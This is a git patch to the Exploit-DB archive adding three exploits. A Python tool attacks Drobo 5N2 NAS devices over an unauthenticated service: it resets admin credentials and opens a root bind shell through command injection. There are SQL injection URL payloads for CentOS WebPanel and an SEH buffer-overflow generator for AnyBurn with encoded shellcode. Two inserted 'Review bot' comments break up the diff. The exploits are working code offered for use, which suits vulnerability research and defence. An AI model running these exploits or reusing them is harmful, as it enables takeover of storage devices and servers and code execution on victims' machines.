From 79fee2e601c118348ca3bca836d1166e8ea9636d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 14 Mar 2020 05:01:46 +0000
Subject: [PATCH] DB: 2020-03-14

4 changes to exploits/shellcodes

AnyBurn 4.8 - Buffer Overflow (SEH)
Drobo 5N2 4.1.1 - Remote Command Injection
Centos WebPanel 7 - 'term' SQL Injection
---
exploits/hardware/remote/48214.py | 247 ++++++++++++++++++++++++++++++
exploits/linux/webapps/48212.txt | 28 ++++
exploits/windows/local/40863.txt | 1 +
exploits/windows/local/48211.py | 125 +++++++++++++++
files_exploits.csv | 3 +
5 files changed, 404 insertions(+)
create mode 100755 exploits/hardware/remote/48214.py
create mode 100644 exploits/linux/webapps/48212.txt
create mode 100755 exploits/windows/local/48211.py

diff --git a/exploits/hardware/remote/48214.py b/exploits/hardware/remote/48214.py
new file mode 100755
index 000000000..902e90630
--- /dev/null
+++ b/exploits/hardware/remote/48214.py
@@ -0,0 +1,247 @@ +# Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection +# Date: 2020-03-12 +# Exploit Author: Rick Ramgattie, Ian Sindermann +# Vendor Homepage: https://www.drobo.com/ +# Version: 4.1.1 and lower. +# CVE: CVE-2018-14709, CVE-2018-14701 +### + +#!/usr/bin/env python3 + +# nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service. +# This utility leverages the lack of any real authentication mechanism to perform arbitrary actions. +# These actions include: +# - Getting device status. +# - Installing applications. +# - Resetting admin credentials. +# - Popping root shells. +# - Turning on party mode. +# This set of exploits is known to affect the Drobo 5N2, firmware version 4.1.1 and lower. +# As of 2020-03-12, newer firmware versions appear to be vulnerable as well, but this has not been verified. +# Most of the Drobo product line also appears to be vulnerable. Again, this has not been verified. +# These vulnerabilities were disclosed to the manufacturer on 2018-07-10. +# More vulnerabilities for this device may be found here: https://blog.securityevaluators.com/4f1d885df7fc +### +# Product of ISE Labs. +# - http://www.securityevaluators.com/ +# - @ISESecurity +### + + +# RE Notes: +# ,-- Encryption bool? +# Handshake Preamble: * /\ +# 44 52 49 4e 45 54 54 4d 07 01 00 00 00 00 00 88 +# \_____________________/ \_________/ \_________/ +# Static string. To/from Size of +# "DIRNETTM" server? next message +# +# Handshake +# 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 00 00... +# \______________________________________________/ \_________/ \_______________________________________________/ \_________________--> +# Device serial number with NULL padding. NULL Device serial number with NULL padding. ESAID? 
88 bytes of NULL +# "dra173202300010" "dra173202300010" +# +# The stat port returns an "ESAID" value that is identical to the serial number on this device (5N2). +# One of the serial numbers in this packet may actually be the ESAID. +# +# Preamble: * +# 44 52 49 4e 45 54 54 4d 0a 01 00 00 00 00 00 88 +# \_____________________/ \_________/ \_________/ +# Static string. To/from Size of +# "DIRNETTM" server? next message +# +# Message: +# XX XX XX XX XX XX XX XX 00 +# \_____________________/ \/ +# Arbitrary length string NULL terminator +# +# +# Protocol flow: +# Initial handshake: ,----- 2nd nibble in 3rd section is different. "07 01 00 00" instead of "0a 01 00 00" #TODO: why? +# | c -> s: Preamble. <-' \_ +# | c -> s: Message: Handshake / `- These two are normally sent as one packet. +# v c <- s: Preamble. <-------- 2nd nibble in 3rd section is different. "87 01 00 00" instead of "8a 01 00 00" #TODO: why? +# Loop: +# +> c -> s: Preamble. +# | c -> s: Message: Command. +# | c <- s: Preamble. +# +- c <- s: Message: Results. > Large responses are split into chunks. Must use size from preamble. + + +import argparse +import logging +import re +import socket +import struct +import sys + + +LOG_FORMAT = '[%(levelname)s]: %(message)s' +BUFFER_SIZE = 1024 +HANDSHAKE_PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x07\x01\x00\x00' +PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x0a\x01\x00\x00' +PREAMBLE_LEN = 16 + +# Note: Payloads usually contain the device's serial number. Replace this with +# '{serial}' so `send_msg` can insert the target's serial. 
+PAYLOADS = { + "daccess" :'78DroboAccessInstallftp://updates.drobo.com/droboapps/2.1/downloads/DroboAccess.tgz{serial}', + "dropbear":'78dropbearInstallftp://updates.drobo.com/droboapps/2.1/downloads/dropbear.tgz{serial}', + "getadmin":'30DRINasAdminConfigDRINasDroboAppsConfig{serial}', + "getnet" :'30{serial}Network', + "gettemp" :'61{serial}', + "partyon" :'26900{serial}', + "partyoff":'260{serial}', + "popit" :'78Drobo`telnetd -l $SHELL -p 8383`AccessInstallbork{serial}', + "restart" :'21{serial}', + "setadmin":'31adminono10111{serial}', + "test" :'824294966876{serial}', + "stdin" :'Handled elsewhere.'} + +DEFAULT_PORT_STAT = 5000 +DEFAULT_PORT_CMD = 5001 +DEFAULT_TIMEOUT = None +HELP_EPILOG=''' +PAYLOADS + daccess - Installs DroboAccess on the target device. At the time of writing, + DroboAccess has numerous unauthenticated command injection + vulnerabilities. Try the following: + GET /DroboAccess/delete_user?username=test';/usr/sbin/telnetd -l /bin/sh -p 8383 + - A long delay and response of "0" is expected. + dropbear - Installs dropbear on the target device. + - A response of "0" is expected. + getadmin - Returns the target's current (redacted) admin configuration. + gettemp - Returns the target's system info (temperature and uptime). + getnet - Returns the target's network info. + partyon - Enables "party mode" on the target. This will cause the target + device's lights to blink for 15 minutes. + partyoff - Prematurely disables "party mode". + popit - Exploits CVE-2019-6801 to spawn a root bind shell on port 8383. + - A response of "1" is expected. + restart - Restarts the target device. + setadmin - Sets administrative options on the target. + - Username: admin + - Password: ono + - Apps enabled: yes + stdin - Reads data from STDIN and sends it as a command. +''' + + +def recv_message(s): + preamble = s.recv(PREAMBLE_LEN) + msg_len = struct.unpack(">I", preamble[-4:])[0] # Parse expected message length from preamble. 
+ message = '' + if msg_len <= 0: + return(message) + while True: + message += s.recv(BUFFER_SIZE).decode('utf-8') + if len(message) >= msg_len: + return(message) # There will be a null at the end. It should be fine. + + +def send_handshake(s, serial): + serial_bytes = serial.encode('utf-8') + hs_body = struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. + hs_body += struct.pack(">I", 0) # 4 byte field, presumably uint, only seen as zero. + hs_body += struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. again... + hs_body += struct.pack("184x") # 184 bytes of NULL padding. + size_bytes = struct.pack(">I", len(hs_body)) # Size of message body. Send with preamble. + hs_data = HANDSHAKE_PREAMBLE + size_bytes + hs_body + logging.debug(repr(hs_data)) + s.send(hs_data) + + +def send_message(s, serial, message): + msg_body = message.format(serial=serial) # Add target device's serial number. + msg_body_bytes = msg_body.encode('utf-8') + msg_body_bytes += struct.pack("x") # NULL terminator. + size_bytes = struct.pack(">I", len(msg_body_bytes)) # Size of XML body. Send with preamble. + msg_data = PREAMBLE + size_bytes + msg_body_bytes + logging.debug(repr(msg_data)) + s.send(msg_data) + + +aparser = argparse.ArgumentParser( + description='nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.', + epilog=HELP_EPILOG, + formatter_class=argparse.RawDescriptionHelpFormatter) +aparser.add_argument("host", help='Host or IP address of the target Drobo.') +aparser.add_argument("payload", help='Payload to use. 
See PAYLOADS.') +aparser.add_argument("-p", "--portstat", help='Specify a non-default stat port on the Drobo.', default=DEFAULT_PORT_STAT, type=int) +aparser.add_argument("-P", "--portcmd", help='Specify a non-default command port on the Drobo.', default=DEFAULT_PORT_CMD, type=int) +aparser.add_argument("-s", "--serial", help='Manually set the target serial number. Skips serial number detection.') +aparser.add_argument("-t", "--timeout", help='Set a timeout in seconds for socket operations.', default=DEFAULT_TIMEOUT, type=float) +aparser.add_argument("-v", "--verbose", help='Increase verbosity.', action='store_true') +args = aparser.parse_args() + +# Basic check for color support. +if sys.stdout.isatty() and sys.platform in ["linux","linux2","darwin"]: + logging.addLevelName(logging.NOTSET, "\033[39m????\033[0m") + logging.addLevelName(logging.DEBUG, "\033[37mDBUG\033[0m") + logging.addLevelName(logging.INFO, "\033[96mINFO\033[0m") + logging.addLevelName(logging.WARNING, "\033[93mWARN\033[0m") + logging.addLevelName(logging.ERROR, "\033[95mERRR\033[0m") + logging.addLevelName(logging.CRITICAL, "\033[91mCRIT\033[0m") +else: + logging.addLevelName(logging.NOTSET, "????") + logging.addLevelName(logging.DEBUG, "DBUG") + logging.addLevelName(logging.INFO, "INFO") + logging.addLevelName(logging.WARNING, "WARN") + logging.addLevelName(logging.ERROR, "ERRR") + logging.addLevelName(logging.CRITICAL, "CRIT") + +if args.verbose: + logging.basicConfig(format=LOG_FORMAT, level=logging.DEBUG) +else: + logging.basicConfig(format=LOG_FORMAT, level=logging.INFO) + +if args.payload == 'stdin': + logging.info("Reading payload from STDIN.") + payload_xml = sys.stdin.read() + logging.debug(payload_xml) +else: + payload_xml = PAYLOADS[args.payload] + + +logging.info("Connecting...") +# Connect to the stat port. This is required for the cmd port to work. +# The stat port also gives us the serial number. 
+sock_stat = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock_stat.settimeout(args.timeout) +sock_stat.connect((args.host, args.portstat)) +# Connect to the cmd port. +sock_cmd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock_cmd.settimeout(args.timeout) +sock_cmd.connect((args.host, args.portcmd)) + +# Pull the serial number from the stat port. +logging.info("Pulling serial number...") +stat_msg = sock_stat.recv(BUFFER_SIZE) +if args.serial: + serial = args.serial +else: + m = re.search('([^<]+)', stat_msg.decode('utf-8')) + if not m: + logging.critical("Could not determine target's serial number!") + logging.debug(stat_msg) + sys.exit(100) + serial = m.group(1) + logging.info("Identified serial: " + serial) + +# Perform a handshake with the cmd port. Requires the serial num. +logging.info('Performing handshake...') +send_handshake(sock_cmd, serial) +recv_message(sock_cmd) # Blank response - trash. + +# Send the payload. +logging.info("Sending payload...") +send_message(sock_cmd, serial, payload_xml) +logging.info("Waiting for response...") +resp = recv_message(sock_cmd) +logging.info("Response:\n" + resp) + +# Cleanup. +sock_cmd.close() +sock_stat.close() +logging.info("Donezo.") \ No newline at end of file diff --git a/exploits/linux/webapps/48212.txt b/exploits/linux/webapps/48212.txt new file mode 100644 index 000000000..651e5c44d --- /dev/null +++ b/exploits/linux/webapps/48212.txt 
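Review bot: The CVE references in 48214.py disagree: the header comment lists `# CVE: CVE-2018-14709, CVE-2018-14701`, while the `popit` entry in `HELP_EPILOG` says it exploits CVE-2019-6801, which the header never mentions. Anyone mapping this entry to vendor advisories or detection content will key on the header, so the identifiers should be reconciled, with a comment beside each `PAYLOADS` key naming the CVE it demonstrates. The RE notes also label the static preamble string "DIRNETTM", but the bytes printed next to it and in `PREAMBLE` (`44 52 49 4e 45 54 54 4d`) decode to "DRINETTM", so both occurrences should read `# "DRINETTM"`. That fixed 8-byte prefix and the default ports 5000/5001 are the stable features of this traffic, so a reader building a network signature from these notes needs the comments to be accurate.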
@@ -0,0 +1,28 @@ +# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection +# Google Dork: N/A +# Date: 2020-03-03 +# Exploit Author: Berke YILMAZ +# Vendor Homepage: http://centos-webpanel.com/ +# Software Link: http://centos-webpanel.com/ +# Version: v6 - v7 +# Tested on: Kali Linux - Windows 10 +# CVE : N/A + +# Type: Error Based SQL Injection +# Payload: +https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' +AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT +(ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO + + +# Type: Time Based SQL Injection +# Payload: +https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' +OR SLEEP(5)-- JCpP + +Centos-Webpanel (http://centos-webpanel.com/) +CentOS Web Panel | Free Linux Web Hosting Control Panel +Free CentOS Linux Web Hosting control panel designed for quick and easy +management of (Dedicated & VPS) servers without of need to use ssh console +for every little thing \ No newline at end of file diff --git a/exploits/windows/local/40863.txt b/exploits/windows/local/40863.txt index 83b87cbe9..7f122f310 100644 --- a/exploits/windows/local/40863.txt +++ b/exploits/windows/local/40863.txt @@ -6,6 +6,7 @@ [+] ISR: ApparitionSec +[+] CVE: CVE-2019-0948 Vendor: diff --git a/exploits/windows/local/48211.py b/exploits/windows/local/48211.py new file mode 100755 index 000000000..a79f3e927 --- /dev/null +++ b/exploits/windows/local/48211.py 
@@ -0,0 +1,125 @@ +# Exploit Title: AnyBurn 4.8 - Buffer Overflow (SEH) +# Date: 2020-03-09 +# Vendor Homepage: http://www.anyburn.com/ +# Software Link : http://www.anyburn.com/anyburn_setup.exe +# Exploit Authors: "Richard Davy/Gary Nield" +# Tested Version: 4.8 (32-bit) +# Tested on: Windows 10 Enterprise x64 +# Vulnerability Type: Buffer Overflow/SEH/Unicode + +# Steps to Produce the Exploit: +# 1.- Run python code +# 2.- Open payload.txt and copy content to clipboard +# 3.- Open AnyBurn choose 'Copy disk to image file' +# 4.- Paste the content of payload.txt into the field: 'Select image file name' +# 5.- Click 'Create Now' and you will see a crash and the payload launch. + +#!/usr/bin/env python + +#Set overall payload size +crash_buffer_size = 10000 +#nseh offset for SEH overwrite +nseh_offset = 9197 + +#location in payload where stack alignment returns to for payload +payloadret = 4459 +#payload filler +junk = "\x71" * payloadret + +#Payload generated via msfvenom, easily changeable as padding is auto calculated +#msfvenom -a x86 -p windows/exec cmd=calc.exe -e x86/unicode_upper BufferRegister=EAX -f py +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51" +buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44" +buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41" +buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50" +buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31" +buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50" +buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49" +buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51" +buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42" +buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b" +buf += b"\x4c\x5a\x48\x44\x42\x4d\x30\x4b\x50\x4b\x50\x43\x30" +buf += b"\x44\x49\x49\x55\x50\x31\x49\x30\x43\x34\x54\x4b\x50" +buf += b"\x50\x50\x30\x44\x4b\x42\x32\x4c\x4c\x54\x4b\x42\x32" +buf += 
b"\x4c\x54\x34\x4b\x43\x42\x4d\x58\x4c\x4f\x46\x57\x4f" +buf += b"\x5a\x4d\x56\x30\x31\x4b\x4f\x56\x4c\x4f\x4c\x33\x31" +buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x49\x31\x48\x4f\x4c" +buf += b"\x4d\x4d\x31\x49\x37\x5a\x42\x4c\x32\x50\x52\x50\x57" +buf += b"\x44\x4b\x30\x52\x4c\x50\x34\x4b\x50\x4a\x4f\x4c\x54" +buf += b"\x4b\x50\x4c\x4c\x51\x54\x38\x5a\x43\x31\x38\x4b\x51" +buf += b"\x48\x51\x32\x31\x44\x4b\x42\x39\x4d\x50\x4b\x51\x59" +buf += b"\x43\x54\x4b\x51\x39\x4d\x48\x4b\x33\x4f\x4a\x4f\x59" +buf += b"\x44\x4b\x30\x34\x44\x4b\x4d\x31\x5a\x36\x30\x31\x4b" +buf += b"\x4f\x56\x4c\x57\x51\x58\x4f\x4c\x4d\x4b\x51\x39\x37" +buf += b"\x4f\x48\x39\x50\x34\x35\x4b\x46\x4d\x33\x33\x4d\x4b" +buf += b"\x48\x4f\x4b\x33\x4d\x4f\x34\x43\x45\x4b\x34\x42\x38" +buf += b"\x44\x4b\x51\x48\x4e\x44\x4b\x51\x59\x43\x31\x56\x54" +buf += b"\x4b\x4c\x4c\x30\x4b\x44\x4b\x50\x58\x4d\x4c\x4d\x31" +buf += b"\x38\x53\x34\x4b\x4b\x54\x44\x4b\x4d\x31\x5a\x30\x53" +buf += b"\x59\x51\x34\x4e\x44\x4d\x54\x51\x4b\x31\x4b\x43\x31" +buf += b"\x52\x39\x51\x4a\x30\x51\x4b\x4f\x49\x50\x51\x4f\x51" +buf += b"\x4f\x30\x5a\x34\x4b\x4c\x52\x4a\x4b\x34\x4d\x51\x4d" +buf += b"\x31\x5a\x4b\x51\x34\x4d\x35\x35\x46\x52\x4b\x50\x4d" +buf += b"\x30\x4b\x50\x30\x50\x51\x58\x4e\x51\x44\x4b\x42\x4f" +buf += b"\x33\x57\x4b\x4f\x59\x45\x47\x4b\x5a\x50\x38\x35\x36" +buf += b"\x42\x32\x36\x52\x48\x37\x36\x45\x45\x47\x4d\x45\x4d" +buf += b"\x4b\x4f\x48\x55\x4f\x4c\x4d\x36\x53\x4c\x4c\x4a\x35" +buf += b"\x30\x4b\x4b\x39\x50\x42\x55\x4c\x45\x57\x4b\x4f\x57" +buf += b"\x4d\x43\x52\x52\x32\x4f\x42\x4a\x4d\x30\x42\x33\x4b" +buf += b"\x4f\x4a\x35\x32\x43\x51\x51\x42\x4c\x52\x43\x4e\x4e" +buf += b"\x53\x35\x42\x58\x52\x45\x4d\x30\x41\x41" + +#Filler padding after payload code to bring us to nseh offset +#auto calculated in case payload size changes +junk1 = "\x71" * int(nseh_offset-(len(junk)+len(buf))) + +#SEH Overwrite +nSeh = "\x61\x70" +#Unicode safe SEH return +seh = "\x09\x48" + +#Stack realignment which takes us 
directly back into shellcode +eax_align = "\x70\x71\x71\x71" +eax_align += "\x54" +eax_align += "\x47" +eax_align += "\x58" +eax_align += "\x47" +eax_align += "\x05\x2F\x11" +eax_align += "\x47" +eax_align += "\x2d\x01\x11" +eax_align += "\x47" +eax_align += "\x50" +eax_align += "\x47" +eax_align += "\xc3" + +#Padding to take us to 10,000 +padding = "\x71" * int(crash_buffer_size-(len(junk)+len(buf)+len(junk1)+len(nSeh)+len(seh)+len(eax_align))) + +#Assembly of parts +buffer=junk+buf+junk1+nSeh+seh+eax_align+padding + +try: + f=open("payload.txt","w") + print "\nAnyBurn Version 4.8 (32-bit) Exploit\n" + print "Software Link : http://www.anyburn.com/anyburn_setup.exe" + print "Exploit Authors: Richard Davy/Gary Nield" + print "Tested on: Windows 10 Enterprise x64" + print "Vulnerability Type: Buffer Overflow/SEH/Unicode\n" + + print "Steps to Produce the Exploit:" + print "1.- Run python code" + print "2.- Open payload.txt and copy content to clipboard" + print "3.- Open AnyBurn choose 'Copy disk to image file'" + print "4.- Paste the content of payload.txt into the field: 'Select image file name'" + print "5.- Click 'Create Now' and you will see a crash and the payload launch.\n" + + print "[+] Creating %s bytes evil payload " %len(buffer) + + f.write(buffer) + f.close() + + print "[+] File payload.txt created..." + +except: + print "[!] File cannot be created..." \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2a3d45dac..7ebee40b7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
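Review bot: The closing `try`/`except:` in 48211.py is a bare except wrapped around the banner prints as well as the file write, so every failure, `KeyboardInterrupt` included, is reported as `[!] File cannot be created...` and the real error is discarded. Catch only the I/O failure and show it, `except IOError as e:` followed by `print "[!] File cannot be created: %s" % e`, and open the file with `with open("payload.txt","w") as f:` so the handle is closed on the error path too. The header should also state that the script is Python 2 only (print statements, and `str` values concatenated with the `b""` literal in `buffer=junk+buf+...`). The `#!/usr/bin/env python` line sits after the comment block, where it has no effect and pins no interpreter.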
@@ -10989,6 +10989,7 @@ id,file,description,date,author,type,platform,port
 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
 48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
+48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18041,6 +18042,7 @@ id,file,description,date,author,type,platform,port
 48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
 48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux,
 48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php,
+48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42466,3 +42468,4 @@ id,file,description,date,author,type,platform,port
 48208,exploits/php/webapps/48208.py,"rConfig 3.9 - 'searchColumn' SQL Injection",2020-03-12,vikingfr,webapps,php,
 48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
 48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
+48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,